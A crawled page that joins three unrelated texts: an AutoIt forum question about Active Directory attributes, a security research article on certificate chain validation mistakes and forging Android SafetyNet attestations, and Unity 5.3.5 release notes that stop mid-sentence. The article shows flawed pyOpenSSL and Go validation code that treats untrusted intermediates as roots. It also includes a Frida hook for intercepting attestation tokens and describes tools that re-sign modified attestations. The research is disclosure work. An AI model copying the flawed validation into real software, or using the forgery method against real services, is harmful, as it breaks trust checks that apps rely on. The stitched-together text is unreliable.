AD UDF - Performance improvements By water, in AutoIt General Help and Support Recommended Posts Recently Browsing 0 members No registered users viewing this page. Similar Content - By Nas I was stuck on changing some areas on my username for some reason please check the script below : #include <AD.au3> #RequireAdmin _AD_Open() ; this portion works just fine _AD_ModifyAttribute("User.a", "GivenName", "John") _AD_ModifyAttribute("User.a", "displayName", "John, Smith") ; this portion I can't get it to work _AD_ModifyAttribute("User.a", "Surname", "Smith") _AD_ModifyAttribute("User.a", "City", "Orlando") _AD_ModifyAttribute("User.a", "State", "FL") _AD_ModifyAttribute("User.a", "country", "US") _AD_Close() Basically the top portion for the Givenname and display name works perfectly but the other portion I am unable to get it to work. - -
https://www.autoitscript.com/forum/topic/169041-ad-udf-performance-improvements/
CC-MAIN-2021-04
en
refinedweb
Chain of Fools: An Exploration of Certificate Chain Validation Mishaps 01. Introduction Typically, when software needs to leverage cryptography, developers use libraries or APIs that abstract many details away from them. They don't need to fully understand how TLS handshakes work to create a TLS socket, nor do they need to understand the cryptographic primitives used to encrypt SSH traffic when making SSH connections. However, some abstractions are leaky, and a better understanding is required to get things right. One example is validation of certificate chains, which is required when using APIs like Android SafetyNet or Android Protected Confirmation, validating remote attestations (like those provided by FIDO2 authenticators), or processing JSON Web Tokens that include signatures with associated X509 chains. Applied cryptography can be hard even when using cryptographic libraries. For example, many cryptographic libraries make it difficult or non-obvious to properly validate certificate chains. Generally speaking, it's not because of defects in the implementation of primitives, but rather the difficulty of designing usable cryptographic APIs and providing clear, unambiguous documentation. The Internet is full of bad guidance regarding the implementation of common cryptographic workflows. Advice on validating certificate chains is no exception. Oftentimes, this advice instructs the developer to (unknowingly) add untrusted intermediates as trusted roots when building certificate chains, which breaks the chain of trust. This allows an attacker to provide an otherwise valid certificate chain that chains up to a "fake" root, which will cause certificate chain validation to succeed when it shouldn't. 02. An Observation: The Genesis of this Research While we were working on a prototype that made use of the Android Protected Confirmation API, which includes a necessary step of validating an attestation certificate chain, we noticed that there wasn't an obvious way of safely validating such a certificate chain that includes untrusted intermediates with the pyOpenSSL Python module. We also recalled having a conversation with one of our colleagues, Adam Goodman, about this being a problem he ran into with the same module. In particular, when creating an X509StoreContext object with a depth greater than 1, (e.g., one which includes untrusted intermediates), the default behavior is to treat all certificates added to the X509Store object as trusted. As such, if a developer intends to build up a chain of trust by iteratively adding certificates to this store, starting with the root and n number of intermediates, and ultimately terminating in the leaf certificate, if any of the intermediates added to the X509Store object signed the leaf certificate, the validation will appear to have been successful. This is particularly troubling in the case when a developer is given n number of untrusted intermediates that could be controlled by an adversary, since they could artificially create a "fake" signing certificate that signs an untrustworthy leaf certificate. Even if the developer has made a policy decision ahead of time about which attestation roots are trusted, and they add those to the trust store, the chain of trust is broken and the certificate validation will succeed if an attacker manages to get a "fake" root in the list of untrusted intermediates which are added to the store. from OpenSSL.crypto import load_certificate, load_privatekey from OpenSSL.crypto import X509Store, X509StoreContext from six import u, b, binary_type, PY3 root_cert_pem = b("""<snip>""") intermediate_cert_pem = b("""<snip>""") leaf_cert_pem = b("""<snip>""") root_cert = load_certificate(FILETYPE_PEM, root_cert_pem) intermediate_cert = load_certificate(FILETYPE_PEM, intermediate_cert_pem) leaf_cert = load_certificate(FILETYPE_PEM, leaf_cert_pem) store = X509Store() store.add_cert(root_cert) store.add_cert(intermediate_cert) store_ctx = X509StoreContext(store, leaf_cert) # Will succeed if the intermediate signed the leaf, even if # the root didn't sign the intermediate. print(store_ctx.verify_certificate()) Recognizing that this was an issue, and still needing a way to properly validate a certificate chain containing untrusted intermediates, Adam made a change to the pyOpenSSL module to add support for including a list of untrusted intermediates when constructing an X509StoreContext object, and submitted a pull request to the pyOpenSSL repository on GitHub. This was in June 2016, and as of this writing the PR has not been merged. It's worth noting that this is not due to oversight or lack of caring by the maintainers of pyOpenSSL, but because the change is a sensitive one—and in a cryptographic library at that—they've been hesitant to merge the PR without first getting the right reviewers in front of it. This is a good reason. 03. Doing Things the "Right" Way With a Non-Obvious API Although it's not immediately obvious, (or at least it wasn't to us and our colleague Adam), there is a way to correctly validate a certificate chain using the API mentioned above. The solution is simple, but the API doesn't really spell this out for us. Consider the following example from a test in the letsencrypt/boulder repository on GitHub: def test_issuer(): """ Issue a certificate, fetch its chain, and verify the chain and certificate against test/test-root.pem. Note: This test only handles chains of length exactly 1. """ certr, authzs = auth_and_issue([random_domain()]) cert = urllib2.urlopen(certr.uri).read() # In the future the chain URI will use HTTPS so include the root certificate # for the WFE's PKI. Note: We use the requests library here so we honor the # REQUESTS_CA_BUNDLE passed by test.sh. chain = requests.get(certr.cert_chain_uri).content parsed_chain = OpenSSL.crypto.load_certificate(OpenSSL.crypto.FILETYPE_ASN1, chain) parsed_cert = OpenSSL.crypto.load_certificate(OpenSSL.crypto.FILETYPE_ASN1, cert) parsed_root = OpenSSL.crypto.load_certificate(OpenSSL.crypto.FILETYPE_PEM, open("test/test-root.pem").read()) store = OpenSSL.crypto.X509Store() store.add_cert(parsed_root) # Check the chain certificate before adding it to the store. store_ctx = OpenSSL.crypto.X509StoreContext(store, parsed_chain) store_ctx.verify_certificate() store.add_cert(parsed_chain) # Now check the end-entity certificate. store_ctx = OpenSSL.crypto.X509StoreContext(store, parsed_cert) store_ctx.verify_certificate() In the above example, the intermediate certificate is validated with the root before being added to the X509Store object. If the intermediate validation passes, only then will it be added to the trust store and used to validate the end-entity certificate. Even though this works, as it does correctly validate the certificate chain, it only supports chains of length 1. Although it would be possible to update this function to support chains of greater depth, the code could get messy quickly, and the opportunity for mistakes to arise would only increase. One of the biggest problems here is that the pyOpenSSL API simply refers to the operation of adding a cert to the X509Store object as add_cert. This is problematic because that API makes sense if the developer makes the correct assumption about how it works, but it can be hugely problematic if they make the wrong assumption, as we did. For example, if the method were renamed to add_trusted_cert or similar, this would be incorrect if the developer uses the API "correctly." Perhaps one way of combating this would be to only allow the developer to add one cert at a time to the X509Store, but this has other usability limitations, and sometimes could be undesirable, (for example in unit tests). 04. Bad Advice on the Internet Google's SafetyNet documentation gives developers the following steps they must follow to verify the origin of a signed SafetyNet attestation: To verify the origin of the JWS message, complete the following steps: - timestamp has been validated and that the nonce, package name, and hashes of the app's signing certificate(s) match the expected values. The example code in the SafetyNet server example Java project uses javax.net.ssl.TrustManager under the hood to validate the certificate chain by means of using Google's JsonWebSignature library. The default trust manager chains up to the system roots of trust, and the example code validates that a path can be built between the leaf certificate provided by SafetyNet up to a system root of trust, likely through intermediate certificates that are also provided in the SafetyNet attestation response. The example code does things right, but there are many steps performed during the validation process that are not explicitly stated by the documentation. Looking at results for "validate SSL certificate chain" on sites like StackOverflow and GitHub, we see a worrying pattern. Let's look at several of these examples. The first example we'll look at is one of the first results for "Golang verify certificate chain" on Google, which you can find here. In particular, the following lines are used to import the intermediate certificates, which are then used as trusted roots: rootPEM, err := ioutil.ReadFile(os.Args[3]) // cert-chain PEM if err != nil { log.Fatal(err) } roots := x509.NewCertPool() ok := roots.AppendCertsFromPEM([]byte(rootPEM)) if !ok { panic("failed to parse root certificate") } This method of validating a certificate chain implicitly trusts all the intermediates in the chain. If there exists a self-signed certificate in the chain, it will be treated as a trusted root, regardless of system trust settings. As a result, an intermediary could modify payload contents, re-sign the payload with a new key, and then attach the new leaf certificate and issuing CA to the request. Searching for a method to validate certificate chains using Python might lead you to this StackOverflow question. The first response, published in 2015, advises the question's author to use pyOpenSSL's X509StoreContext to validate the chain, which falls victim to the issues described earlier. This is in part due to incomplete documentation and bad advice on the internet, and in part due to unit tests for pyOpenSSL that perform the likely-undesirable validation of a certificate with intermediates as trusted roots. This StackOverflow question submission asks how to verify a certificate chain using the openssl verify command. In this case, there is a correct response (instructing the poster to use the -untrusted option), but there is also another high-rated answer that suggests using cat to combine the roots and intermediates into a single list of certificates, all of which will be considered trusted roots. A question attached to this answer asks "Will this actually verify the intermediate cert against the root cert?" to which someone replies "It does. I just re-ran the commands with a chain that I know is correct." Joel Sandin brought this same issue up on the cryptography-dev mailing list in August of 2016. He says: "It's clear from what I've found online that developers are confused and may have introduced vulnerabilities into their code." It is fair to assume this is the case—it seems relatively unlikely that users who follow the misleading advice would check back in once updated answers were posted calling out the dangers of the incorrect methods of certificate chain validation. The failure mode is insidious: there are no false negatives introduced by accidentally treating intermediate certificates as trusted roots, so unless validation methods are explicitly tested with input that includes a self-signed CA in the list of intermediates, this issue can go undetected. This raises an important point. Software developers typically have deadlines. Oftentimes, they're incentivized to get their code working, not necessarily to get it right. When you hit a wall when trying to solve a tough problem, and you finally get it working, how often do you ask yourself if you solved the problem the right way? This reminds me of the following sentiment about losing your keys: "It's frustrating to feel like your lost keys are always in the last place you look, but the alternative is to keep looking for them after you've found them." - u/droidpat on r/Showerthoughts, Reddit That's the thing. When doing anything with cryptography in software, you've got to keep looking for your keys even after you've found them. 05. Misuse-resistant APIs Security practitioners have historically tended to blame the user: every single security issue, after all, is due to some sort of "human error." It's a tidy excuse that allows the conversation to end there, but a new, more holistic model of security is growing. This new model considers how easy it is for a developer to misuse a primitive. This is particularly important in the field of cryptography, where seemingly small mistakes can have massive consequences (ex: nonce reuse). Misuse resistance is relevant at all levels, from design of primitives up to the high-level APIs. AES-GCM-SIV, for example, is designed to minimize the impact of nonce misuse. EdDSA signatures are deterministic, protecting against the kinds of mistakes that caused the leak of the PS3 content signing key via a reuse of k values in the ECDSA scheme. Miscreant is a library developed by Tony Arcieri with the explicit goal of providing misuse-resistant APIs for common cryptographic tasks. Miscreant consists of libraries in five different languages implementing misuse-resistant primitives. Other libraries (such as libsodium) may be built on primitives that are not misuse resistant, but expose APIs such that misusing the primitives is hard or impossible. Many older cryptographic primitives are still used purely due to inertia. Trail of Bits points this out well in their Seriously, stop using RSA post: there are myriad ways to misuse RSA, many of which are due to subtle implementation concerns that developers would not know about without stronger cryptography knowledge. But rather than lamenting that developers are not sufficiently knowledgeable about padding oracles, the path forward involves building tooling that does not require domain-specific knowledge to use. 06. Misuse Resistance and Legacy Cryptography X509 parsing is a minefield, and the tooling built around it (much of it bindings to OpenSSL) has far too many knobs for the average developer to build safe applications. If you are expecting developers to implement certificate chain validation, providing explicit instructions is a minimum requirement, and providing tooling to do so is preferable. This is a rule of thumb that extends to any situation in which you are asking developers to perform some cryptographic step: we must ask "what knowledge is needed to do this correctly?", "what is the impact of misuse or improper implementation?", and "how can we reduce or eliminate the risk caused by lack of developer cryptographic knowledge?". Ideally, there should be no requirement that developers manually implement these steps: a service provider should maintain client libraries that implement all the necessary cryptographic checks without exposing intricacies to the developer when it's not necessary. Google does a version of this by providing an online validation API for SafetyNet tokens, but it exists only for development purposes, and is heavily rate limited. 07. Quantifying the Use of SafetyNet Knowing that certificate chain validation is hard to get right, and that it's a necessary step of validating SafetyNet attestations, we set out to understand how widely used this API is among among popular Android applications, and among applications in different categories. The reasons for this are twofold. For one, knowing how widely used this API is useful in its own right, and two, because of the necessary certificate chain validation step, knowing how popular this API is will give us an idea of how many implementations could potentially be vulnerable to incorrect certificate chain validation logic. At a high level, answering these questions required the following steps: 1) acquiring a list of popular Android applications by number of installs and a ranking of applications, 2) downloading the Android Packages (APKs) associated with these applications en masse, and 3) analyzing the corpus of APKs to determine the use of the Safetynet Attestation API. In the following sections, we describe the methods we used to accomplish the three aforementioned steps. Acquiring a List of Top Android Apps In order to find out which of the top Android apps are using the SafetyNet Attestation API, we first needed to acquire a source that outlined what those top apps were. In our search for a reliable source, we found that there were some smaller lists that detailed dozens of apps, and there were paid app store analytics services that also provided these sorts of lists. However, we wanted our work to be reproducible by other researchers; so, we opted to use Android Rank, which has been collecting application metrics since 2011 and has been used by others for similarly large analyses. Using data from their site, we were able to obtain a list of the most installed Android applications and assemble a list of the top Android applications for 32 general application categories (e.g., Communication, Finance, Social, etc.) and 17 categories of games (e.g., Action, Puzzles, Sports, etc.). In total, this resulted in a list of over 24,296 apps. Building a Corpus of Applications After compiling a list of Android applications, the next thing that we had to do was to acquire as many of the 24,000 APKs as possible. Currently, Google does not allow for automated downloading of APKs from the Google Play Store; moreover, you are restricted to downloading apps for your particular region. As a result, we decided to build our corpus of applications from APK downloading services such as APKPure and apkmonk. These sites allow users to download APKs for both current and older versions of apps, apps from different regions, etc., so that they can be sideloaded, or in our case, analyzed. Because downloading such a large number of applications by hand was intractable, we opted to automate this process. We did so by building off the work done by the Open GApps Project, which downloads Google Apps packages from APK downloading services like the two we mentioned above. Using the scripts that we created, we were able to download 98% (23768/24296) of these applications. We were unable to download all of these applications because of two reasons: 1) we did not limit our list to free apps and 2) AndroidRank's list of the most popular applications includes apps that are no longer available in general, or on the two sites that we used. Analyzing APKs In order to determine the use of SafetyNet by a particular application, we performed a series of checks of the applications that is progressively more intensive. Before getting started, it's helpful to describe what an APK is and what it looks like under-the-hood. APKs can be thought of as zip files that contain the code for the application, the resources, assets and other files as shown in the diagram below. Modified version of diagram by Ryantzj At this top level and after the APK is unzipped, is where our first set of checks for the use of the SafetyNet happen. We start by checking for the existence of a SafetyNet properties file. Properties files are often used to store configuration information for applications. As it relates to this work, there will sometimes be a file named play-services-safetynet.properties. This file will contain information relating to the version of SafetyNet that is being used by the application. It is important to note that the existence of this file only means that one of the four SafetyNet APIs is being used, but it doesn't tell us if the one being used is the Attestation API. In addition to the SafetyNet Attestation API, there are SafetyNet APIs for Safe Browsing, reCAPTCHA, and for verifying apps. Nevertheless, in our process, we store this information so that we can catalog which versions of SafetyNet are being used. After checking for the existence of a SafetyNet properties file, we analyze the contents of the Android Manifest. The Android Manifest is an XML file that contains information such as the app's package name, the activities and services used by the app, the permissions that app needs to operate, etc. In the Android Manifest, we are specifically looking for the key com.google.android.safetynet.ATTEST_API_KEY. Last, if we are unable to ascertain the use of the SafetyNet Attestation API, we analyze the classes.dex file, searching specifically for the presence of " AttestationResponse" or an attestation API Key. Initial Results Prior to our work, it was found that less than one percent of Android applications were using one of the safetynet APIs among a sample of 3000 applications. This study took place back in 2017, which was just two years after SafetyNet was first introduced in 2015. Our study showed that the use of SafetyNet has increased since then to approximately 5.26% of the approximately 24 thousand apps that we were able to successfully analyze. The category that showed the largest use of SafetyNet was Finance at 18.52% while the lowest group was Tools (e.g., flashlight apps) at 1.62%. Among the most installed applications according to Android Ranks, the use of SafetyNet proved to be higher than average at 10.82%. Top 5 categories by SafetyNet usage Bottom 5 categories by SafetyNet usage In addition, we found that only 23% of the apps that we found to be using SafetyNet were using the latest version of the SafetyNet API, 17.0.0. The vast majority (62%) were using the previous version of the API: 16.0.0. Since the latest version was released on June 17th, we expect the percentage of applications using version 17.0.0 to increase. Using More Advanced Approaches Initially, when we began this research, we focused on trying to detect the use of the SafetyNet APIs by file existence and pattern matching as mentioned above. This approach has its drawbacks, with one of the largest being that the method calls that we were looking for could be obfuscated, thus thwarting any direct or fuzzy string matching. In addition, by relying on the presence of the properties file to determine which versions of safetynet are being used, our figures would be biased in respect to the applications that use properties files as a configuration mechanism. Because of these limitations, we turned to other library detection mechanisms. Specifically, we decided to use LibScout. LibScout works by first extracting profiles from original versions of a library. In our case, this would be the .jars for the different version of com.google.android.gms.play-services-safetynet. Using the profiles, LibScout statically detects the use of libraries in Android apps by building application profiles and then applying a pattern matching algorithm to check for the presence of a given library. If a given library is deemed to be present, LibScout outputs a similarity score between 0 and 1 where 1 means that a given library version was matched exactly. Using LibScout, we analyzed a sample of 7,832 applications to see how the results compared to purely searching for strings within the APK file. We found that a higher percentage of applications were using the SafetyNet library at 7.2%. Similar to our analysis of the versions of the SafetyNet library that relied on the properties file, we found that most (86%) of the applications that we analyzed were not using the latest version. Last, we found that the most popular app category that was using SafetyNet was Gaming at 11.2%. Limitations It is important to note that while our corpus of apps is larger than the study run in 2017, it is small compared to the entire population. Moreover, the sample that we collected contains more apps that can be categorized as games than any other category. Therefore, these results can't be generalized to the entire Android ecosystem. 08. Research Methodology When setting out to perform this research, we decided to approach the problem from a number of different angles simultaneously. In addition to determining how widely used the SafetyNet Attestation API is in certain verticals, we also wanted to explore what it would take to forge SafetyNet attestations. While some of us were looking into the possibility of modifying the SafetyNet attestation from the stance of a network MITM, our colleague Mikhail Davidov was looking into doing so through in-process hooking with the Frida instrumentation framework. Ultimately, we focused primarily on forging attestations through a mitmproxy Addon, but did confirm that this should also be possible through in-process hooking with Frida. In the spirit of sharing as much of our research process as possible, so as to enable further investigation by other researchers, we're including the following snippet below. Java.perform(function() { var attResp = Java.use('com.google.android.gms.safetynet.SafetyNetApi$AttestationResponse'); attResp.getJwsResult.implementation = function() { var jwsToken = this.getJwsResult() console.log(jwsToken); // Change the token here. return jwsToken; } },0); 09. Proof of Concept To demonstrate this issue in action, we wrote several utilities: - An Android app that requests a SafetyNet attestation - A Flask web app that receives and incorrectly validates attestations - A tool to modify and re-sign the attestation, including a mitmproxy Addon You can access these three utilities on GitHub. Our Flask application makes use of the X509Context pattern that led to the investigation into these issues in the first place. jwsmodify contains a method modify_jws_and_forge_signature, which takes a JWS payload in raw bytes as input and performs a transformation. The transform function is used to modify the payload (to, for example, set passing SafetyNet values by setting ctsProfileMatch and basicIntegrity to true). Finally, the payload is re-signed by a newly-generated self-signed CA that is encoded back into the JWS. This allows us to forge SafetyNet assertions. We include a mitmproxy Addon with the JWS modification tools. By default, the Addon looks for SafetyNet attestations and sets them to passing. Our Flask application will validate both unmodified attestations and attestations modified by our tools. While our proof of concept tooling focuses on SafetyNet attestations in particular, the same tools should be applicable to the modification of any JWS payload that uses the x5c parameter to bundle certificate chains with the signature. 010. How We Can Make Things Better There are a number of steps that developers can take to prevent improper certificate chain validation or other cryptography pitfalls. - Use high-level libraries and abstractions wherever possible. Ideally, these libraries will shield you from having to deal with anything cryptographic. For example, the NSURLSession API for iOS and macOS allows developers to download data from or upload data to HTTPS URLs, but doesn't require knowledge of the lower level cryptographic primitives that it builds upon. - If you need to interact directly with cryptographic libraries or APIs, choose misuse resistant ones where possible, such as Miscreant and libsodium. - When doing anything with cryptography, don't assume because something works that it's correct. In other words, keep looking for your keys even after you've found them. ;) - Ask for help! This can come in the form of requesting additional documentation or clarification from vendors, or by bringing up questions in online communities. - Be skeptical. The stakes can be pretty high when getting things wrong with cryptography, and the failure modes are often subtle. Also, vendors should take great care when requiring low-level cryptographic steps of any kind from developers integrating with their APIs. Ideally, they should provide client libraries that abstract as many of these details away from the user, and failing that should provide detailed documentation. We can also work to prevent these kinds of mishaps as a security community, by educating developers and providing help when we see it's needed, (hat tip to Scott Arciszewski of Paragon Initiative for his contributions to the Stack Overflow community, among other things). Making suggestions without assigning blame not only helps individuals, but it also improves the perception of security practitioners in the public eye, hopefully making people less shy about asking questions in the future. 011. Next Steps for Research In addition to testing incorrect certificate chain validation implementations with the Android SafetyNet API, this research should also apply anywhere where untrusted intermediate certificates are provided through an untrusted channel and used to build a chain of trust, then validated against a root of trust. Other examples that come to mind are when verifying a signed message from the Android Protected Confirmation API, or when validating a WebAuthn attestation statement. Additionally, it may be possible to use the steps outlined in this research to test incorrect certificate chain validation implementations at scale by modifying JWS, (or other payloads containing untrusted intermediate certificates), en masse. Finally, scanning public source code repositories for faulty certificate chain validation logic could surface interesting results. 012. Conclusion It's no secret that it's easy to get things wrong when leveraging cryptography in software, but there are concrete steps that can be taken by developers, vendors, cryptographic library authors, and security practitioners to prevent mistakes from happening. In this research, we've demonstrated how things like certificate chain validation can go awry, and what that means in practice when developers are tasked with using or writing cryptographic code with insufficient information or expertise. Forging Android SafetyNet attestations by taking advantage of incorrect certificate chain validation implementations is just one example of how things can go wrong when incorrect assumptions are made in cryptographic systems. Like many things in security, humans are core to the experience. By working together as a community and not assigning blame when things go wrong, we can work toward a more secure future.
https://duo.com/labs/research/chain-of-fools
CC-MAIN-2021-04
en
refinedweb
Unity 5.3.5 The Unity 5.3.5 public release brings you a few improvements and a large number of fixes. Read the release notes below for details. For more information about the previous main release, see the Unity 5: IL2CPP - Stripping of symbols and debug info is now enabled by default. Development builds still have symbols which makes for a slightly larger binary. - Asset Bundles: Added offset argument to AssetBundle.CreateFromFile and AssetBundle.LoadFromFile methods. - Asset Bundles: Output the CRC value for the manifest asset bundle. - Asset Management: Introduced AssetDatabase.GetAssetDependencyHash method which returns the hash of all the dependencies of an asset. - Cluster Rendering: Improved cluster networking layer and reduced instability while using cluster input. - Graphics: Dynamic batching was reintroduced for particles, lines and trails. (766802) - IL2CPP: Reduce the binary size and build time for projects which make use of many C# attributes. - iOS: Added a compile flag in the trampoline code in order to allow disable the filtering of emoji characters. - iOS: Added device support for iPhone SE and iPad Pro 9.7". - OpenGL: ComputeBuffer now uses the same data layout as Direct3D. - Networking: Added support for IPv6 networks in UdpClient. (767741) - VR: Updated Oculus API and plugin to version 1.3.2. Downloading 1.3.2 OVRPlugin from Oculus is no longer necessary. - Windows Store: On IL2CPP scripting backend, Unity players are now shipped as DLLs rather than static libraries. This significantly reduces platform support module installation size as well as decreases generated C++ code linking time. Changes - Android: IL2CPP - Full debug version of IL2CPP libraries are stored in Temp/StagingArea/Il2Cpp/Native. - OpenGL: ComputeBuffer data layout changes to match Direct3D; see Improvements section for details. - Installer: Updated EULA. Fixes - Analytics: Fixed a rare crash. Only occurs when analytics is on and importing a complete project from asset store with analytics off. - Android: Audio - Fixed OpenSL output not selected when default buffer size selected. (784899) - Android: Buildpipe - Don't make use of preview SDK tools installed. (788040) - Android: Buildpipe - Fixed AAPT errors on project export. (786918) - Android: Buildpipe - Fixed AAR plugin and resource issues on exported projects. (765396) - Android: Disabled Debug markers on PowerVR Series5 devices due to driver issues. (780958) - Android: Fix for EGL_BAD_NATIVE_WINDOW error on resume. (747898) - Android: Fix for GPU skinning on Adreno GPUs. (763755) - Android: Fix for syncing to low framerate with VSync off. (777167) - Android: Fixed a crash in the Development build for some Android devices with PowerVR GPUs (e.g. Asus Memo Pad). (787491) - Android: Fixed blending with background on Unity splash screen. - Android: Fixed crash on Nvidia Shield tablet. (765744) - Android: Fixed crash when loading scenes intermittently. (751530) - Android: Fixed immersive mode switching off on some KitKat devices when pressing volume buttons. (779338) - Android: Fixed incorrect width/height when changing orientation after changing anti-aliasing settings. (771542) - Android: Fixed potential crash when using WWW without having Internet permission (also affects use of Unity Analytics). (779877) - Android: Fixed potential race condition in atomic operations on ARM processors. - Android: Fixed Standard Shader lighting issue caused by half-precision overflow on Mali GPUs. (761744) - Android: Fixed value of trackingEnabled. - Android: Workarounds for OpenGL ES 3 shader compiler problems on Adreno GPUs. (777617) - Animation Window: Fixed Null Reference Exception in Curve Editor. (775565) - Animation Window: Disabled animation sampling of an optimized game object hierarchy in the animation window. (753270) - Animation Window: Fixed custom components not appearing in the Add Property menu of the Animation Window. (760809, 759069) - Animation Window: Fixed selection loss in animation window when pasting keyframes. (715416) - Animation: Fixed a crash related to exposed skeleton. (784942) - Animation: Fixed a crash when importing an animation where a whole curve was corrupted. (774052) - Animation: Fixed a performance issue for AnimatorOverrideController rebind. (779058) - Animation: Fixed an issue where instantiating a prefab with an Animator Component for the first time took longer than the subsequent times. (771609) - Animation: Fixed an issue where rotation curves would be created as Euler curves by default when using the Animation Component. (772668) - Animation: Fixed an issue where the scale was not working in editor on GameObject with OptimizeGameObject. (774484) - Animation: Fixed animation event inheriting from ScriptableObject not getting triggered. (762952) - Animation: Fixed crash when an animation key tried to activate a game object which had animator attached to it. (786873) - Animation: Fixed crash when calling Animator.Update(0) in an AnimationEvent. (783821) - Animation: Fixed crash when GameObject with Animator is instantiated in StateMachineEnter/Exit. (770045) - Animation: Fixed crash when shutting down standalone app with Script Playables. (775677) - Animation: Fixed error message in console while optimizing animation hierarchy from the inspector. (775773) - Animation: Fixed issue where Animation was distorted when animated object was scaled and Optimize Game Objects was selected. (766898, 758322) - Animation: Fixed scale value getting zeroed when removing scale curve components in AnimationWindow. (689644) - APIUpdater: Fixed AssemblyUpdater crash when verifying WSA / Windows Phone assemblies. (767506) - APIUpdater: Fixed ScriptUpdater crash when processing Boo / UnityScript containing Hash literals. (769880) - Asset Bundles: Fixed issue where would not take into account space on device, and could hang. (762829) - Asset Bundles: Fixed the error messages when building variant asset bundles. (769858) - Asset Bundles: Fixed an issue where unloading an asset bundle with animated objects (legacy animation) during play mode crashes the editor. (775822) - Asset Bundles: Added back scene asset bundles compression statistics. (768965) - Asset Bundles: Fixed a crash while loading asset bundle asynchronously. (747800) - Asset Bundles: Fixed a potential crash when decompressing corrupted LZMA bundles. (782773) - Asset Bundles: Fixed Compress Assets On Import setting ignored when switching platform (762739) - Asset Bundles: Fixed CreateFromMemory not working with "." in filenames. (734216) - Asset Import: Fixed a crash on FBX import in some rare circumstances. (768846) - Asset IMport: Fixed issue where changing date modified on directory meta file caused all files below that directory to be reprocessed. This was also affecting VCS. (756559) - Audio: Don't try to load any sounds when Unity audio is disabled. (776044, 763036) - Audio: Fixed an issue where Low Pass Filter didn't work on Audio Listener. (732854) - Batch mode: Fixed an issue where BuildPlayer calls might cause compilation errors to be logged in subsequent runs. (703290, 786195) - Cache Server: Upgraded the node.js version 0.12.7. (760234) - Compute: Do not log warnings/errors when current build target does not support compute shaders. - Core: Added stacktrace for logging statements and exceptions called on threads. (697872, 633905) - Core: ArgumentCache.TidyAssemblyTypeName is now alloc-free if the type name is already clean. (738249) - Core: Fixed crash when scaling prefab with mesh that is not read/write enabled. (766019) - Core: When exporting a package with scene's dependencies, checkboxes are available next to folder icon. (752733) - Core: is now a case-insensitive Dictionary, as per RFC2616 spec. (770155) - D3D11: Fixed a deadlock which would occur when trying to restore focus to a minimized standalone player running in Fullscreen Exclusive mode. (523691) - D3D11: Fixed exclusive mode window reactivation issues after focus has been lost. (788555) - D3D11: Fixed some rare crashes on memory constrained systems (log would contain resource creation failure messages). - D3D9: Player loop will now be processed in the background again when the graphics device is lost (Windows are locked, window is minimized, etc.). (752626) - Editor: Fix for core assemblies not being reloaded after encountering errors in user scripts. (750423) - Editor: Added support for resizing the height of the preferences window. (763313) - Editor: Adjusted the width of the 'Build Settings' window so that it properly display its contents, even if support for some of the players is not currently available. (728634) - Editor: Files with invalid names can no longer be dragged into a project. (663994) - Editor: Fixed a crash that could happen when animation window is open, and playmode is entered. (696623) - Editor: Fixed a crash when locking cursor from constructor or static initializer. (765466) - Editor: Fixed a crash when padding ASTC texture when building from command line. (759288) - Editor: Fixed an inconsistency between visible and hidden meta file modes, where empty folders were recreated in 'visible' mode. (588531) - Editor: Fixed an issue that could cause scenes containing prefab instances with driven transforms to immediately become dirty. (709639) - Editor: Fixed an issue that was causing transformations to be modified when entering and subsequently coming back from play mode. (759115) - Editor: Fixed an issue where compression wasn't being applied in calls to BuildPipeline.BuildStreamedSceneAssetBundle(). (781866) - Editor: Fixed an issue where unloaded scenes were removed from hierarchy after exiting playmode. (769613) - Editor: Fixed an issue with dragging a Sprite/Texture2D into the inspector causing a PolygonCollider2D to use it even though it is not dropped on the component editor itself. (778125, 780607) - Editor: Fixed changing order of components not getting saved. It now also support undo. (764986) - Editor: Fixed crash on launch if "metadata" folder is deleted before launching. (746964) - Editor: Fixed newly installed Unity command line activation issue. (790345) - Editor: Fixed performance issue in Sprite Inspector. (709059) - Editor: Fixed Target Support module download URLs in Build Settings. - Editor: Fixed the asset importer error when calling Refresh() during an assembly import. (730559) - Editor: Fixed WebViewWindow's freed memory access. (775366) - Editor: Fixed wrong error message when returning license via command line. (784727) - Editor: Fixed an issue when logging off and opening the Service Window would be missing. (781863) - Editor: If a read only file or folder is duplicated, the read only status is no longer duplicated. (730245) - Editor: Improved error messages for unsupported target platform in batch mode. (782752) - Editor: Now show alert popover for invalid serial format. (775898) - Editor: Remove SelectionBase from LOD Group. (763231) - Editor: Sped up importing of some Fonts by updating progress bar less often than "crazy often". - Editor: Fixed access to destroyed window during shutdown. (775244) - Editor: Fixed access violation in some editor GUIView operations. (769833) - GI: Fixed incorrect normal mapping on Directional Specular lightmaps; shader code was not matching up what Enlighten was baking. (755421, 766533, 766546, 779696, 756020, 780025) - GI: Clamped DynamicGI.indirectScale to allowed range. (664953) - GI: Disabled LightProbeGroup components no longer display visualization in the scene view. (662572) - GI: Fixed errors when using baked lightmaps & multi-scene editing. (753822) - GI: Fixed realtime GI texture coordinates sometimes going wrong on static-batches meshes. (743273) - GI: Fixed some cases of scenes not referencing the correct lighting data asset after bake. (757575) - GI: Improved wording of various Enlighten error messages. - GI: Now properly initialize baked scenes in some code paths to avoid error on console. (753822) - GI: Upgraded to Enlighten3.02p4. Fixes direct lighting getting baked into lightmap (697565). Fixes a precision issue and out-of-bounds texture access in baking, which could lead to a crash in the Final Gather stage. (767110) - GI: Changing Reflection Probe component positioning in the inspector makes realtime probe black. (653592) - GI: Fixed a Reflection Probe baking issue when multiple scenes are used in a project. - GI: Fix for baking a scene with objects added before saving the scene not being included in the result. (728610) - GI: Fixed a crash when building reflection probe data on specific scenes containing Canvas elements. (767560, 763045) - Graphics: Fixed a glitch in Crunch format compressed non-alpha texture after using sprite packer. (774638, 768171) - Graphics: Fixed internal profiler for static batching on Android, iPhone and Windows Store. (769539) - Graphics: Fixed material index not being used when calling Graphics.DrawMeshNow with rotation. (765378) - Graphics: Fixed MovieTexture crash when loading a video with no audio stream. - Graphics: Fixed potential crash in SetGpuProgramName. - Graphics: Fixed static batching errors when meshes have additional vertex data streams with mismatching vertex count. (775261) - Graphics: Fixed TrailRenderer showing a gap between current position and the last update. (779129) - Graphics: Upgrading a shader with a DX11 [annotation] at the start of the file now doesn't crash. (766992) - IL2CPP: Correct an intermittent crash when Environment.GetCommandLineArguments is called. (775804) - IL2CPP: Emit proper C++ code for COM marshaling of methods that have at least one parameter that cannot be marshaled. (789905) - IL2CPP: Fixed a rare deadlock during Resources.UnloadUnusedAssets. (756912) - IL2CPP: Fixed an intermittent crash in the experimental memory profiler. (776152) - IL2CPP: Fixed an issue with Socket.Select and IL2CPP where a 